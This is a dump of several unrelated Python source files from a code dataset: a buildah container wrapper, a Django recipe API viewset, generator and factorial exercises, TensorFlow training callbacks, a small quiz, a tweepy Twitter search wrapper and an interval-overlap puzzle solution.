_logging.getLogger()\n\nglobal_options = {}\n#timings = open(\"/tmp/timings\", \"wt\")\n\n\nclass BuildahError(Exception):\n pass\n\n\nclass BuildahNotFound(BuildahError):\n pass\n\n\ndef _optify_key(k):\n if len(k) == 1:\n return \"-{}\".format(k)\n return \"--{}\".format(k.replace(\"_\", \"-\"))\n\n\ndef _split_special(d):\n special = {}\n normal = {}\n for key, value in d.items():\n if key.startswith(\"_\"):\n special[key[1:]] = value\n else:\n normal[key] = value\n return (special, normal)\n\n\ndef _optify(d):\n opts = []\n for key, value in d.items():\n if value is None:\n continue\n key = _optify_key(key)\n if isinstance(value, bool):\n opts.append(key)\n elif isinstance(value, (list, tuple, set)):\n for v in value:\n opts += [key, v]\n else:\n opts += [key, str(value)]\n return opts\n\n\ndef _buildah(subcommand, *args, **kwargs):\n special, options = _split_special(kwargs)\n json_ = special.get(\"json\", False)\n json_flag = special.get(\"json_flag\", True)\n list_ = special.get(\"list\", False)\n wrapper = special.get(\"wrapper\")\n capture_output = special.get(\"capture_output\", json_ or list_ or wrapper)\n\n if not wrapper:\n wrapper = lambda x: x\n\n if json_ and json_flag:\n options[\"json\"] = True\n\n cmd = (\n [\"buildah\"]\n + _optify(global_options)\n + [subcommand]\n + _optify(options)\n + list(args)\n )\n\n print(\"Running {}\".format(\" \".join([str(_).strip() for _ in cmd])))\n t_start = _time.time()\n result = _sp.run(cmd, stdout=_sp.PIPE if capture_output else None, stderr=_sp.PIPE, text=True)\n if result.returncode != 0:\n raise BuildahError(result.stderr)\n #timings.write(_json.dumps({\"subcommand\": str(subcommand), \"options\": options, \"args\": [str(_) for _ in args], \"duration\": _time.time() - t_start}) + \"\\n\")\n if json_:\n result = _json.loads(result.stdout)\n elif capture_output:\n result = result.stdout\n\n if list_:\n # Handle \"null\" return string, the \"containers\" subcommand\n # returns \"null\" instead of \"[]\" when there are no containers\n return [wrapper(_) for _ in result or []]\n\n if 
capture_output:\n return wrapper(result)\n\n return result\n\n\nclass ConfigurableSet(set):\n\n def __init__(self, name_or_id, option, *args, **kwargs):\n super().__init__(*args, **kwargs)\n self._option = option\n self._name_or_id = name_or_id\n\n def add(self, value):\n config(self._name_or_id, **{self._option: value})\n return super().add(value)\n\n def discard(self, value):\n config(self._name_or_id, **{self._option: f\"{value}-\"})\n return super().discard(value)\n\n\nclass ConfigurableMapping(dict):\n\n def __init__(self, name_or_id, option, *args, **kwargs):\n super().__init__(*args, **kwargs)\n self._name_or_id = name_or_id\n self._option = option\n\n def __setitem__(self, name, value):\n config(self._name_or_id, **{self._option: {name: value}})\n return super().__setitem__(name, value)\n\n def __delitem__(self, name):\n config(self._name_or_id, **{self._option: {name: None}})\n return super().__delitem__(name)\n\n\nclass Info:\n\n def __init__(self, name, reader):\n self.name = name\n self._reader = reader\n\n def __get__(self, obj, objtype):\n if self.name not in obj._cache:\n obj._cache[self.name] = self._reader(obj.info)\n return obj._cache[self.name]\n\n\nclass Configurable(Info):\n\n def __set__(self, obj, val):\n obj._cache[self.name] = val\n config(obj.id, **{self.name: val})\n\n\nclass Inspectable:\n\n _TYPE = None\n\n def __init__(self, name_or_id):\n self._name_or_id = name_or_id\n self.info = None\n self._cache = dict()\n self.refresh()\n\n def inspect(self):\n return inspect(self._name_or_id, type=self._TYPE)\n\n def refresh(self):\n self.info = self.inspect()\n\n\nclass Image(Inspectable):\n\n _TYPE = \"image\"\n id = Info(\"id\", _op.itemgetter(\"FromImageID\"))\n name = Info(\"name\", _op.itemgetter(\"FromImage\"))\n digest = Info(\"digest\", _op.itemgetter(\"FromImageDigest\"))\n\n def rm(self):\n return rmi(self.id)\n\n def push(self, destination):\n return push(self.id, destination)\n\n def pull(self):\n return pull(self.id)\n\n def tag(self, *aliases):\n return tag(self.id, *aliases)\n\n\nclass Container(Inspectable):\n\n _TYPE = \"container\"\n _config = None\n\n id = Info(\"id\", lambda x: x[\"ContainerID\"])\n name = Info(\"name\", lambda x: x[\"Container\"])\n annotations = Configurable(\"annotation\", _op.itemgetter(\"ImageAnnotations\"))\n cmd = Configurable(\"cmd\", lambda x: x[\"OCIv1\"][\"config\"].get(\"Cmd\", []) or [])\n entrypoint = Configurable(\n \"entrypoint\",\n lambda x: x[\"OCIv1\"][\"config\"].get(\"Entrypoint\", []) or [],\n )\n port = Configurable(\"port\", lambda x: list(x[\"OCIv1\"][\"config\"].get(\"ExposedPorts\", {}).keys()))\n imageid = Info(\"imageid\", _op.itemgetter(\"FromImageID\"))\n env = Configurable(\n \"env\",\n lambda x: ConfigurableMapping(\n x[\"ContainerID\"],\n \"env\",\n dict(_.split(\"=\", 1) for _ in x[\"OCIv1\"][\"config\"].get(\"Env\", [])),\n ),\n )\n labels = Configurable(\n \"label\",\n lambda x: ConfigurableMapping(\n x[\"ContainerID\"],\n \"label\",\n x[\"OCIv1\"][\"config\"].get(\"Labels\", {}) or {},\n ),\n )\n workingdir = Configurable(\"workingdir\", lambda x: x[\"Config\"][\"config\"][\"WorkingDir\"])\n user = Configurable(\"user\", lambda x: x[\"Config\"][\"config\"][\"User\"])\n arch = Configurable(\"arch\", lambda x: x[\"Config\"][\"architecture\"])\n os = Configurable(\"os\", lambda x: x[\"Config\"][\"os\"])\n author = Configurable(\"author\", lambda x: x[\"OCIv1\"].get(\"author\"))\n volumes = Configurable(\n \"volume\",\n lambda x: ConfigurableSet(\n x[\"ContainerID\"],\n \"volume\", \n 
(x[\"OCIv1\"][\"config\"].get(\"Volumes\") or {}).keys(),\n ),\n )\n onbuild = Configurable(\"onbuild\", lambda x: x[\"Config\"].get(\"OnBuild\"))\n stop_signal = Configurable(\"stop_signal\", lambda x: x[\"OCIv1\"][\"config\"].get(\"StopSignal\"))\n\n def __init__(self, name_or_id=None, base=None):\n if name_or_id is None and base is None:\n raise RuntimeError(\"You need to either pass an existing image name or a base image to create a new container from\")\n\n if base is not None:\n name_or_id = from_(base, _wrapper=str, name=name_or_id)\n\n super().__init__(name_or_id)\n\n def rmi(self, **options):\n return rmi(self.imageid, **options)\n\n def rm(self, **options):\n return rm(self.id, **options)\n\n def add(self, source, *args, **options):\n return add(self.id, source, *args, **options)\n\n def add_contents(self, contents, *args, mode=None, **options):\n with _tempfile.NamedTemporaryFile() as f:\n if mode is not None:\n _os.fchmod(f.fileno(), mode)\n f.write(contents)\n f.flush()\n return add(self.id, f.name, *args, **options)\n\n def copy(self, source, *args, **options):\n return copy(self.id, source, *args, **options)\n\n @_contextlib.contextmanager\n def mount(self, **options):\n yield list(mount(self.id, **options).values())[0]\n umount(self.id)\n\n def commit(self, image_name, **options):\n return commit(self.id, image_name, **options)\n\n def run(self, *args, **options):\n return run(self.id, *args, **options)\n\n\ndef rmi(name_or_id, **kwargs):\n return _buildah(\"rmi\", name_or_id, _capture_output=True, **kwargs)\n\n\ndef rm(name_or_id, **kwargs):\n return _buildah(\"rm\", name_or_id, _capture_output=True, **kwargs)\n\n\ndef images(*args, **options):\n return _buildah(\n \"images\",\n *args,\n _list=True,\n _json=True,\n _wrapper=lambda x: Image(x[\"id\"]),\n **options\n )\n\n\ndef containers(*args, **options):\n return _buildah(\n \"containers\",\n *args,\n _list=True,\n _json=True,\n _wrapper=lambda x: Container(x[\"id\"]),\n **options\n )\n\n\ndef inspect(image_or_container, **options):\n try:\n info = _json.loads(\n _buildah(\n \"inspect\",\n image_or_container,\n _capture_output=True,\n **options\n ),\n )\n if info.get(\"Config\"):\n info[\"Config\"] = _json.loads(info[\"Config\"])\n return info\n except BuildahError as e:\n raise BuildahNotFound(\n \"Could not find container or image {!r}\".format(image_or_container),\n ) from e\n\n\ndef from_(base, _wrapper=Container, **options):\n f = _tempfile.NamedTemporaryFile(mode=\"w+t\")\n _result = _buildah(\n \"from\",\n base,\n _capture_output=True,\n cidfile=f.name,\n _wrapper=None,\n **options,\n )\n return _wrapper(str(f.read()))\n\n\ndef commit(name_or_id, image_name, **options):\n return _buildah(\n \"commit\",\n name_or_id,\n image_name,\n _wrapper=lambda _: Image(_.strip()),\n **options,\n )\n\n\ndef unshare():\n if \"BUILDAH_ISOLATION\" in _os.environ:\n return\n cmdline = open(\"/proc/self/cmdline\", \"rt\").read().split(\"\\0\")\n cmdline = [\"buildah\"] + _optify(global_options) + [\"unshare\"] + cmdline\n _os.execvp(\"buildah\", cmdline)\n\n\ndef run(name_or_id, cmd, **options):\n if isinstance(cmd, str):\n cmd = [\"sh\", \"-c\", cmd]\n\n return _buildah(\"run\", name_or_id, *cmd, **options)\n\n\ndef copy(name_or_id, *args, **options):\n return _buildah(\"copy\", name_or_id, *args, _capture_output=True, **options)\n\n\ndef info():\n return _buildah(\"info\", _json=True, _json_flag=False)\n\n\ndef mount(*names_or_ids, **options):\n output = _buildah(\"mount\", *names_or_ids, _capture_output=True, **options)\n output = 
output.strip()\n\n if not output:\n return {}\n\n if len(names_or_ids) > 1 or not names_or_ids:\n return dict(_.split(\" \") for _ in output.split(\"\\n\"))\n return {names_or_ids[0]: output}\n\n\ndef umount(*names_or_ids, **options):\n output = _buildah(\"umount\", *names_or_ids, _capture_output=True, **options)\n output = output.strip()\n return output.split(\"\\n\")\n\n\ndef add(name_or_id, *args, **options):\n return _buildah(\"add\", name_or_id, *args, _capture_output=True, **options)\n\n\ndef _shlex_join(l):\n return \" \".join(_shlex.quote(_) for _ in l)\n\n\ndef config(name_or_id, **options):\n def list_writer(x):\n return [f\"{k}={v}\" if v is not None else f\"{k}-\" for k, v in x.items()]\n\n def mapping_writer(x):\n return [f\"{k}={v}\" if v is not None else f\"{k}-\" for k, v in x.items()]\n\n writer = {\n # Even though entrypoint and cmd are output in `inspect` as lists\n # One supports accepting a json array, the other only strings that\n # are then kinda `shlex.split` into an array again.\n # In order to prevent confusion, we justr decide that the only valid\n # representation for is is arrays, we convert the input accordingly\n # and as of now, do not need to do anything about the output since\n # that is arrays already in both cases.\n \"entrypoint\": _json.dumps,\n \"cmd\": _shlex_join,\n # I know a \"key=value\" string is even the official interface via `putenv`,\n # but in my head these are mappings and so my head always hurts when I\n # have to force it into this weird mode, so just handle them all as dicts\n \"env\": mapping_writer,\n \"label\": mapping_writer,\n \"annotation\": mapping_writer,\n }\n for key, value in options.items():\n if key not in writer:\n continue\n options[key] = writer[key](value)\n return _buildah(\"config\", name_or_id, **options)\n\n\ndef pull(name, **options):\n return _buildah(\"pull\", name, quiet=True, _wrapper=lambda x: Image(x.strip()), **options)\n\n\ndef push(name_or_id, destination, **options):\n return _buildah(\n \"push\",\n name_or_id,\n destination,\n quiet=True,\n **options,\n )\n\n\ndef tag(name_or_id, *aliases, **options):\n return _buildah(\"tag\", name_or_id, *aliases, **options)\n","repo_name":"wontfix-org/python-buildah","sub_path":"buildah.py","file_name":"buildah.py","file_ext":"py","file_size_in_byte":12562,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"17690976764","text":"from rest_framework import viewsets\nfrom rest_framework import permissions\nfrom rest_framework.pagination import PageNumberPagination\nfrom rest_framework.decorators import action\n\nfrom recipe.serializers import IngredientSerializers, GroupSerializers, RecipeListSerializers, RecipeDetailSerializers\nfrom recipe.models import Ingredient, Group, Recipe\n\n\nclass RecipeViewPagination(PageNumberPagination):\n page_size = 500\n page_size_query_param = 'page_size'\n\n\nclass IngredientViewSet(viewsets.ModelViewSet):\n queryset = Ingredient.objects.all().order_by('name')\n serializer_class = IngredientSerializers\n\n\nclass GroupViewSet(viewsets.ModelViewSet):\n queryset = Group.objects.all().order_by('id')\n serializer_class = GroupSerializers\n\n\nclass RecipeViewSet(viewsets.ModelViewSet):\n pagination_class = RecipeViewPagination\n\n def get_serializer_class(self):\n if self.action == 'retrieve':\n return RecipeDetailSerializers\n return RecipeListSerializers\n\n def get_queryset(self):\n if self.action == 'retrieve':\n return Recipe.objects.all()\n\n query_string = 
self.request.query_params.get(\"query_string\", False)\n min_num_of_ingredients = self.request.query_params.get(\"num\", 4)\n if(not query_string):\n return Recipe.objects.all()\n print(query_string)\n return Recipe.objects.get_recipes(query_string, min_num_of_ingredients)\n","repo_name":"anil-allipilli/WhatCanICook","sub_path":"recipe/viewsets.py","file_name":"viewsets.py","file_ext":"py","file_size_in_byte":1430,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"5378036991","text":"#generator is an iterator(which repeat things in loop) which give us only vlaue at a time not while loop give all value at one time by iterating\n# but generator give one by one as we typr __next__() and then another with another next\n#we can use this things if there are millions of file and we dont want all of them to come our system we will set generator on how to come and will call it\n# one by one using next(). Yield is an generator used instead of return. string is iterable and int are not.\ndef gen(n):\n for i in range(n):\n yield i\nq=gen(5)\nprint(q.__next__())\nprint(q.__next__())\n#quiz\n\ndef factorial(a):\n if a==0 or a==1:\n return 1\n sum=a\n sum=sum*(factorial(a-1))\n return sum\n\ndef gen_fact(n):\n for i in range(n):\n yield print(factorial(i))\ng=gen_fact(10)\nprint(g.__next__())\nprint(g.__next__())\nprint(g.__next__())\nprint(g.__next__())\n\n\n\n","repo_name":"Vishal-sundar-kaira/pythonProject4","sub_path":"Pythonprojects4/generatorr and iterabllee.py","file_name":"generatorr and iterabllee.py","file_ext":"py","file_size_in_byte":888,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"42216102113","text":"# Python std.\nimport os\nimport abc\nfrom abc import abstractmethod\n\n# 3dsr\nfrom .. import file_sys as jbfs\nfrom .. import vis2d as jbv2\nfrom .. import normals as jbn\nfrom .. import img as jbim\n\n# 3rd party\nimport numpy as np\nimport tensorflow as tf\nimport matplotlib.pyplot as plt\n\n\nclass Callback(abc.ABC):\n def __init__(self, period):\n self.set_period(period)\n\n @abstractmethod\n def on_epoch_end(self, epoch, force_run=False, **kwargs):\n raise NotImplementedError\n\n def get_period(self):\n return self._period\n\n def set_period(self, period):\n if not isinstance(period, int) or period < 1:\n raise Exception('\"period\" has to be integer number greater than 0.')\n self._period = period\n\n @abstractmethod\n def get_file_name(self):\n raise NotImplementedError\n\n @abstractmethod\n def set_file_name(self, fname):\n raise NotImplementedError\n\n @abstractmethod\n def add_file_name_suffix(self, suff):\n \"\"\" Adds suffix to the current file name. 
In case\n of file (not directory), it adds it before the extension.\n\n Args:\n suff (str): Suffix to add.\n \"\"\"\n raise NotImplementedError\n\n\nclass HistorySaver(Callback):\n \"\"\" Callback for svaing the training history to .npz file.\n \"\"\"\n\n def __init__(self, file_name, period=10):\n \"\"\"\n Args:\n file_name (str): Absolute path to output history file.\n period (int): Interval between saving current history in epochs.\n \"\"\"\n if not os.path.exists(os.path.dirname(file_name)):\n raise Exception('The directory \"{d}\" intended for saving '\n 'the learning history does not exist.'.\n format(d=os.path.dirname(file_name)))\n\n super(HistorySaver, self).__init__(period)\n\n self._fname_base = jbfs.unique_file_name(file_name)\n self._curr_fname = None\n\n def on_epoch_end(self, ep, force_run=False, **kwargs):\n if ep % self._period == 0 or force_run:\n history = kwargs['history']\n\n # Store last file name.\n old_file_name = self._curr_fname\n\n # Generate new file name.\n self._curr_fname = self._fname_base[:-4] + \\\n '_epoch_{:03d}'.format(ep) + '.npz'\n self._curr_fname = jbfs.unique_file_name(self._curr_fname)\n\n # Save.\n np.savez_compressed(self._curr_fname, **history)\n\n # Remove old file.\n if old_file_name is not None:\n os.remove(old_file_name)\n\n def get_file_name(self):\n return self._fname_base\n\n def set_file_name(self, fn):\n self._fname_base = fn\n self._curr_fname = None\n\n def add_file_name_suffix(self, suff):\n fn = self.get_file_name()\n nam, ext = jbfs.split_name_ext(fn)\n self.set_file_name(nam + suff + '.' + ext)\n\n\nclass WeightsSaverTF(Callback):\n \"\"\" Callback for saving the current weights each `period` epochs. TF's\n `tf.Train.Saver` is used for this purpose.\n \"\"\"\n def __init__(self, file_name, sess,\n period=10, keep_chkpt_every_n_hours=10000.0,\n max_to_keep=1):\n \"\"\"\n Args:\n file_name (str): Absolute path to checkpoint file.\n sess (tf.Session): TF session.\n period (int): Interval between saves, in epochs.\n keep_chkpt_every_n_hours (float): See `tf.train.Saver`.\n max_to_keep (int): See `tf.train.Saver`.\n \"\"\"\n super(WeightsSaverTF, self).__init__(period)\n\n self._fname = file_name\n self._sess = sess\n self._saver = tf.train.Saver(\n keep_checkpoint_every_n_hours=keep_chkpt_every_n_hours,\n max_to_keep=max_to_keep)\n\n def on_epoch_end(self, ep, force_run=False, **kwargs):\n if ep % self._period == 0 or force_run:\n self._saver.save(self._sess, self._fname, global_step=ep)\n\n def get_file_name(self):\n return self._fname\n\n def set_file_name(self, fn):\n self._fname = fn\n\n def add_file_name_suffix(self, suff):\n fn = self.get_file_name()\n nam, ext = jbfs.split_name_ext(fn)\n self.set_file_name(nam + suff + '.' + ext)\n\n\nclass PlotsSaver(Callback):\n \"\"\" Saves the plots of given learning curves. It only saves the plots once\n in `period` epochs. It saves 3 same plots but with different y axis\n ranges to increase the chance of getting the visuallu pleasing result.\n Each time it saves the plots it overwrites the old plots. 
Each of these\n plots add the string \"_n\" to the end of the name (where n is integer\n number).\n \"\"\"\n\n # Default visualization properties used in case of missing values.\n default_clr = 'k'\n default_line_style = '-'\n default_line_width = 1.0\n\n def __init__(self, fname, period=10, names=None, colors=None,\n line_styles=None, xlab='epochs', ylab_data='E',\n ylab_lr='learning rate', logy_lr=True, title='',\n legend=True, legend_loc='best', grid=True,\n xlim=None, ylim_data=None, ylim_lr=None,\n font_size=12):\n \"\"\"\n Args:\n fname (str): Absolute path to plot.\n period (int): Interval between saves in epochs.\n names (dict): key - variable name, value a string to display.\n colors (dict): {'varname': 'color_code'}\n line_styles (dict): {'varname': 'style_code'}\n xlab (str): x-axis kabel.\n ylab_data (str): y-axis flor data (left)\n ylab_lr (str): y-axis for learning rate (right)\n logy_lr (bool): Whether to display y-axis in log scale.\n title (str): Title.\n legend (bool): Whether to display legend.\n legend_loc (int or str): See `pytplot.legend`\n grid (bool): Show grid?\n xlim (tuple of float): Limits of x axis.\n ylim_data (tuple of float): Limits of data y axis.\n ylim_lr (tuple of float): Limits of lr y axis.\n font_size (int): Font size.\n \"\"\"\n\n # Init parent.\n super(PlotsSaver, self).__init__(period)\n\n if not os.path.exists(os.path.dirname(fname)):\n raise Exception('The directory \"{d}\" intended for saving '\n 'the plots does not exist.'.\n format(d=os.path.dirname(fname)))\n if period < 1:\n raise Exception('The period value must be greater than 0.')\n\n # Save parameters.\n self._fname = fname\n\n # Save vis. properties.\n self._names = names\n self._colors = colors\n self._line_styles = line_styles\n self._xlab = xlab\n self._ylab_data = ylab_data\n self._ylab_lr = ylab_lr\n self._logy_lr = logy_lr\n self._title = title\n self._legend = legend\n self._legend_loc = legend_loc\n self._grid = grid\n self._xlim = xlim\n self._ylim_dat = ylim_data\n self._ylim_lr = ylim_lr\n self._font_size = font_size\n\n # Check file name and possibly create output dir.\n fpath_base = os.path.dirname(fname)\n if not os.path.exists(fpath_base):\n print('WARNING: Output plot file path {} does not exist, '\n 'attempting to create it.'.format(fpath_base))\n jbfs.make_dir(fpath_base)\n\n def on_epoch_end(self, ep, force_run=False, **kwargs):\n data = kwargs['history']\n\n if ep % self._period == 0 or force_run:\n # keys = data.keys()\n keys = self._names.keys()\n\n # If names were not provided, use data keys.\n names = self._names if self._names is not None \\\n else {k: k for k in keys}\n\n # Get other available vis. properties given data keys.\n colors = {k: self._colors.get(k, PlotsSaver.default_clr)\n for k in keys}\n line_styles = {k: self._line_styles.\n get(k, PlotsSaver.default_line_style) for k in keys}\n line_widths = {k: PlotsSaver.default_line_width for k in keys}\n\n # Set y axis range for data.\n mv = np.max([np.max(data[k]) for k in keys if k != 'lr'])\n ylim_d1 = self._ylim_dat if self._ylim_dat is not None else mv\n ylim_d2 = ylim_d1 / 2\n ylim_d3 = ylim_d1 / 4\n\n # Get file names.\n fname, fext = jbfs.split_name_ext(self._fname)\n f1 = fname + '_1.' + fext\n f2 = fname + '_2.' + fext\n f3 = fname + '_3.' 
+ fext\n\n # Plot 3 plots with different y axis range.\n for fn, yl in zip([f1, f2, f3], [ylim_d1, ylim_d2, ylim_d3]):\n jbv2.plot_tr_curves_lr(names, data, colors=colors,\n line_styles=line_styles,\n line_widths=line_widths,\n xlab=self._xlab,\n ylab_data=self._ylab_data,\n ylab_lr=self._ylab_lr,\n logy_lr=self._logy_lr,\n title=self._title,\n legend=self._legend,\n legend_loc=self._legend_loc,\n grid=self._grid,\n xlim=self._xlim,\n ylim_data=yl, ylim_lr=self._ylim_lr,\n font_size=self._font_size,\n display=False, save=True, file=fn)\n\n def get_file_name(self):\n return self._fname\n\n def set_file_name(self, fn):\n self._fname = fn\n\n def add_file_name_suffix(self, suff):\n fn = self.get_file_name()\n nam, ext = jbfs.split_name_ext(fn)\n self.set_file_name(nam + suff + '.' + ext)\n\n\nclass ReduceLROnPlateau(Callback):\n \"\"\"Reduce learning rate when a metric has stopped improving.\n \"\"\"\n def __init__(self, lr, sess, factor=0.1, patience=10,\n epsilon=1e-4, min_lr=1e-6, verbose=True):\n \"\"\"\n Args:\n lr (tf.Variable): Variable containing learning rate.\n sess (tf.Session): TF session.\n factor (float): Value by which to multiply lr.\n patience (int): How many epochs to wait before changing lr.\n epsilon (float): By how much the monitored value needs to be\n improving\n min_lr (float): Bottom threshold for lr.\n \"\"\"\n\n super(ReduceLROnPlateau, self).__init__(period=1)\n\n if factor >= 1.0:\n raise ValueError('ReduceLROnPlateau does not support a factor >= 1.0.')\n self._lr = lr\n self._sess = sess\n self._factor = factor\n self._min_lr = min_lr\n self._epsilon = epsilon\n self._patience = patience\n self._verbose = verbose\n self._wait = 0\n self._best = 0\n self._mode = 'min'\n self._monitor_op = None\n self.reset()\n\n def reset(self):\n \"\"\"Resets wait counter and cooldown counter.\n \"\"\"\n\n self._monitor_op = lambda a, b: np.less(a, b - self._epsilon)\n self._best = np.Inf\n\n self._wait = 0\n self.lr_epsilon = self._min_lr * 1e-4\n\n def on_epoch_end(self, ep, force_run=False, **kwargs):\n current = kwargs['redlr_val']\n\n if self._monitor_op(current, self._best):\n self._best = current\n self._wait = 0\n else:\n if self._wait >= self._patience:\n old_lr = self._sess.run(self._lr)\n if old_lr > self._min_lr + self.lr_epsilon:\n new_lr = old_lr * self._factor\n new_lr = max(new_lr, self._min_lr)\n self._sess.run(self._lr.assign(new_lr))\n if self._verbose:\n print('\\nEpoch {:d}: reducing learning rate '\n 'to {:.2e}.\\n'.format(ep, new_lr))\n self._wait = 0\n else:\n self._wait += 1\n\n def get_file_name(self):\n raise NotImplementedError\n\n def set_file_name(self, _):\n raise NotImplementedError\n\n def add_file_name_suffix(self, _):\n raise NotImplementedError\n\n\nclass VisNormalsSaver(Callback):\n \"\"\" Saves the visualization of predicted normals in terms of RGB images.\n \"\"\"\n def __init__(self, period, sess, path_imgs, path_normals_gt,\n path_out_imgs, inp, outp, feeddict, frame='ocv',\n normalize=True, norm_mode='global'):\n \"\"\"\n\n Args:\n path_imgs:\n path_out_imgs:\n inp:\n outp:\n feeddict:\n \"\"\"\n # Init parent.\n super(VisNormalsSaver, self).__init__(period)\n\n self._period = period\n self._sess = sess\n self._path_imgs = path_imgs\n self._path_normals_gt = path_normals_gt\n self._path_out_imgs = path_out_imgs\n self._inp = inp\n self._outp = outp\n self._feeddict = feeddict\n self._frame = frame\n self._normalize = normalize\n self._norm_mode = norm_mode\n\n jbfs.make_dir(path_out_imgs)\n\n def on_epoch_end(self, ep, force_run=False, 
**kwargs):\n if ep % self._period == 0 or force_run:\n files_imgs = jbfs.ls(self._path_imgs)\n files_gt = jbfs.ls(self._path_normals_gt)\n\n for fim, fgt in zip(files_imgs, files_gt):\n img = jbim.load(jbfs.jn(self._path_imgs, fim))\n if self._normalize:\n img = jbim.normalize(img, mode=self._norm_mode)\n ngt = np.load(jbfs.jn(self._path_normals_gt, fgt))['normals']\n\n fd = {k: v for k, v in self._feeddict.items()}\n fd[self._inp] = img[None]\n npred = self._sess.run(self._outp, feed_dict=fd)[0]\n\n mask = jbim.get_mask(ngt)\n img_ngt = jbn.normals2img(ngt, frame=self._frame)\n img_npred = jbn.normals2img(npred, frame=self._frame,\n mask_fgrd=mask)\n img_cmp = np.concatenate((img_ngt, img_npred), axis=1)\n plt.imsave(jbfs.jn(self._path_out_imgs, fim), img_cmp)\n\n def get_file_name(self):\n raise NotImplementedError\n\n def set_file_name(self, _):\n raise NotImplementedError\n\n def add_file_name_suffix(self, _):\n raise NotImplementedError\n","repo_name":"bednarikjan/jblib","sub_path":"deep_learning/callbacks.py","file_name":"callbacks.py","file_ext":"py","file_size_in_byte":14652,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"12367614632","text":"\"\"\"PINK FLUFFY UNICORNS\"\"\"\n\nimport colors as c\nfrom utils import ask\n\nintro = c.red + '''\nWelcome, to the pink fluffy unicorns quiz\n'''\n\ndef q1():\n answer = ask(c.red + 'Question 1: What colour are the unicorns?')\n if answer == \"pink\":\n print('And what a lovely color it is')\n return True\n print('That is incorrect')\n return False\n\ndef q2():\n answer = ask(c.red + 'Question 2: Where are they dancing?')\n if answer == \"rainbows\":\n print('Its a wonderful place to dance on, try it')\n return True\n print('That is incorrect')\n return False\n\ndef q3():\n answer = ask(c.red + 'Question 3: Please use one word to describe the texture of their magical fur?')\n if answer == \"smiles\":\n print('It feels wonderful on your skin' + c.clear)\n return True\n print('That is incorrect' + c.clear)\n return False\n\nquestions = [q1,q2,q3]\n\n\n","repo_name":"ozjack/python-1","sub_path":"old/pink.py","file_name":"pink.py","file_ext":"py","file_size_in_byte":895,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"10888609680","text":"import logging\nimport time\n\nimport tweepy\nfrom tweepy import Cursor, OAuthHandler\n\nfrom .config import cfg\n\n\nclass Twitter(object):\n \"\"\"Twitter wrapper.\"\"\"\n\n SLEEP_TIME = (15 * 60 + 5)\n\n def __init__(self):\n \"\"\"Initialize Twitter wrapper.\"\"\"\n auth = OAuthHandler(cfg.TWITTER_CONSUMER_KEY,\n cfg.TWITTER_CONSUMER_SECRET)\n auth.secure = True\n auth.set_access_token(cfg.TWITTER_ACCESS_TOKEN,\n cfg.TWITTER_ACCESS_SECRET)\n self.api = tweepy.API(auth)\n\n def query(self, query_args=None):\n \"\"\"Return a new TwitterQuery object.\n\n :param query_args: List of raw args to pass to the new `TwitterQuery`.\n \"\"\"\n return TwitterQuery(self, query_args)\n\n def get_country(self, name):\n \"\"\"Return a Place ID for a country search.\n\n :param name: Name of the country.\n \"\"\"\n places = self.api.geo_search(query=name, granularity='country')\n if places:\n place_id = places[0].id\n else:\n raise Exception(u'Country {} not found.'.format(name))\n return place_id\n\n\nclass TwitterQuery(object):\n \"\"\"Twitter Query chainable object.\"\"\"\n\n def __init__(self, twitter, query_args=None):\n self.twitter = twitter\n self.query_args = query_args or []\n\n def 
_format_hashtag(self, hashtag):\n return hashtag if hashtag[0] == '#' else '#' + hashtag\n\n def _format_mention(self, mention):\n return mention if mention[0] == '@' else '@' + mention\n\n def _limit_handled(self, cursor):\n \"\"\"Return a wrapped cursor that sleeps after a Rate Limit Response.\"\"\"\n # When cursor.next() returns StopIteration, the loop will break.\n while True:\n try:\n yield cursor.next()\n except tweepy.RateLimitError:\n logging.info('Encountered tweepy.RateLimitError, sleeping for '\n '{} seconds.'.format(self.SLEEP_TIME))\n time.sleep(self.SLEEP_TIME)\n logging.info('Done sleeping, continue results iteration.')\n\n def execute(self):\n \"\"\"Executes the query with any applied argument.\"\"\"\n if not self.query_args:\n raise Exception('Cannot execute query with no arguments.')\n query = ' '.join(self.query_args)\n print(query)\n results = Cursor(self.twitter.api.search, q=query, rpp=100)\n return self._limit_handled(results.items())\n\n def hashtags(self, hashtags):\n \"\"\"Add hashtags to the search query.\n\n :param hashtags: List of hashtags to search for.\n \"\"\"\n if hashtags:\n normalized_hashtags = [self._format_hashtag(h) for h in hashtags]\n self.query_args.append('({})'\n .format(' OR '.join(normalized_hashtags)))\n return self\n\n def mentions(self, mentions):\n \"\"\"Add user mentions to the search query.\n\n :param mentions: List of user mentions to search for.\n \"\"\"\n if mentions:\n normalized_mentions = [self._format_mention(m) for m in mentions]\n self.query_args.append('({})'\n .format(' OR '.join(normalized_mentions)))\n return self\n\n def since(self, since_dt):\n if since_dt:\n self.query_args.append(u'since:{}'\n .format(since_dt.date().isoformat()))\n return self\n\n def place(self, place):\n if place:\n self.query_args.append(u'place:{}'\n .format(self.twitter.get_country(place)))\n return self\n","repo_name":"slint/aueb-datamining","sub_path":"politically_correct/twitter.py","file_name":"twitter.py","file_ext":"py","file_size_in_byte":3659,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"23313275648","text":"with open('input.txt') as f:\n data = f.read().splitlines()\n\n\ncount = 0\ncount2= 0\n\n\nfor l in data:\n first, second = l.split(',')\n\n\n begin_f, last_f= first.split('-')\n\n begin_s, last_s = second.split('-')\n\n begin_f = int(begin_f)\n last_f = int(last_f)\n\n begin_s = int(begin_s)\n last_s = int(last_s)\n\n\n if (begin_f <= begin_s and last_f >= last_s) or (begin_f >= begin_s and last_f <= last_s): # challenge 1\n count += 1\n\n # check if one of them starts or ends in the middle of the other\n if (begin_f <= begin_s <= last_f or begin_f <= last_s <= last_f) or (begin_s <= begin_f <= last_s or begin_s <= last_f <= last_s): # challenge 2\n count2 += 1\n\n\nprint(\"challenge 1: \", count)\n\nprint(\"challenge 2: \", 